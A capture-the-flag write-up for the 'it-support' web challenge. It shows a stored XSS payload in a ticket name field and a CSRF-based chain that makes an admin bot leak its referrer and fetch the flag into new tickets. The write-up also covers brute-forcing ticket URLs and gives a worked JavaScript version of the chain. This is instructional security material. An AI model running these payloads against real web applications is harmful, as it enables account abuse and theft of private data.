# it-support

> category: web
> solves: 16

## Recon

We have a web application for creating tickets; each ticket has a name and content. Every ticket gets its own URL (not a very random one). A few seconds after we create a ticket it gets updated, so we can assume some bot is visiting our ticket. The goal is to get data out of that bot and use it to obtain the flag.

## XSS

We get XSS through the name parameter when creating a ticket, using the payload below:

`"><img src=# onerror=alert()>`

## Data exfiltration

Even though we have XSS, we cannot exfiltrate data from the admin bot directly: as the challenge description says, the bot has no external access, so we cannot get a callback from the bot carrying the data we want.

CSRF to the rescue: using the XSS, we make the bot create a ticket whose content is the data we want to read.

- The CSRF token is in the response body, so we can read `_token` with fetch:

  > fetch('/').then(r=>r.text()).then(r=> {console.log(r.split('_token" value="')[1].slice(0,40))})

- To find the ticket created via CSRF, observe the ticket URL format:

  > /TK-{date}{time}-{random_number}

  The date is the exact date, the time can be taken from the ticket's update time, and random_number is in the range 1000-2000, so we can brute-force it.

## Getting the flag

- From the Referer of the admin bot we get the URL `http://127.0.0.1:1234/admin-secret-ticket-asdtf5342ewadsfdxe3d`.
- Visiting that endpoint gives the admin's ticket URL `http://34.89.146.147:30233/ticket-admin-324d2s/TK-20220212060011-1968`.
- Visiting that, we see a hidden form that POSTs to the flag endpoint `/get-your-flag`.
- From the admin bot, sending a POST request to that endpoint with the token and a comment creates a ticket on the admin side containing the flag.
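As an added example (not code from the original writeup), the snippet below puts the exfiltration chain together the way the XSS payload would run it in the bot's browser: read the page, pull out `_token`, and POST the data we want (here the bot's `document.referrer`) as a new ticket, plus the candidate list for the brute-force step. The create-ticket endpoint `/ticket` and the form field names `name` and `content` are assumptions; only `_token` and the `TK-{date}{time}-{random_number}` URL format come from the writeup. A constructed fake fetch stands in for the bot so the chain runs offline.

```javascript
// Added example for the it-support writeup; not the original payload.
// Assumptions: ticket creation is POST /ticket with fields name, content, _token.

// Extract the CSRF token from the page HTML. The writeup's one-liner splits on
// the value attribute and takes 40 chars; here we read up to the closing quote,
// which works regardless of the token length.
function extractToken(html) {
  const marker = '_token" value="';
  const idx = html.indexOf(marker);
  if (idx === -1) return null;
  const start = idx + marker.length;
  const end = html.indexOf('"', start);
  return html.slice(start, end === -1 ? undefined : end);
}

// URL-encoded body for the forged ticket request.
function buildTicketBody(token, name, content) {
  const params = new URLSearchParams();
  params.set('_token', token);
  params.set('name', name);
  params.set('content', content);
  return params.toString();
}

// Candidate ticket paths for the brute-force step: /TK-{YYYYMMDDHHMMSS}-{1000..2000}.
// The attacker requests each of these to find the ticket the bot just created.
function ticketCandidates(datetime) {
  const out = [];
  for (let n = 1000; n <= 2000; n++) out.push(`/TK-${datetime}-${n}`);
  return out;
}

// Body of the XSS payload. Runs same-origin in the bot's browser, so the token
// is readable and the session cookie rides along with the POST. Returns the
// HTTP status of the create request so the caller can tell if it was accepted.
async function exfilViaCsrf(fetchImpl, data) {
  const html = await fetchImpl('/').then(r => r.text());
  const token = extractToken(html);
  if (!token) throw new Error('no _token found in page');
  const res = await fetchImpl('/ticket', {           // assumed create endpoint
    method: 'POST',
    headers: { 'Content-Type': 'application/x-www-form-urlencoded' },
    body: buildTicketBody(token, 'exfil', data),
  });
  return res.status;
}

// Constructed sample page and fake fetch so the chain can be exercised offline.
const SAMPLE_PAGE =
  '<form method="POST" action="/ticket">' +
  '<input type="hidden" name="_token" value="abcdefghijklmnopqrstuvwxyz01234567890123">' +
  '<input name="name"><textarea name="content"></textarea></form>';

function makeFakeFetch(log) {
  return async (url, opts = {}) => {
    if (url === '/' && !opts.method) {
      return { status: 200, text: async () => SAMPLE_PAGE };
    }
    if (url === '/ticket' && opts.method === 'POST') {
      log.push(opts.body);                           // record what the "bot" sent
      return { status: 302, text: async () => '' };
    }
    return { status: 404, text: async () => '' };
  };
}

// In the real payload this would be: exfilViaCsrf(fetch, document.referrer)
if (typeof require !== 'undefined' && require.main === module) {
  const log = [];
  exfilViaCsrf(makeFakeFetch(log), 'http://127.0.0.1:1234/admin-secret-ticket-...')
    .then(status => console.log('create status', status, 'body', log[0]));
}
```

In the real payload the whole thing is wrapped in the `onerror` handler of the injected `<img>`, and `fetchImpl` is the browser's `fetch`; the attacker then walks `ticketCandidates()` for the minute shown as the ticket's update time to locate the ticket carrying the data.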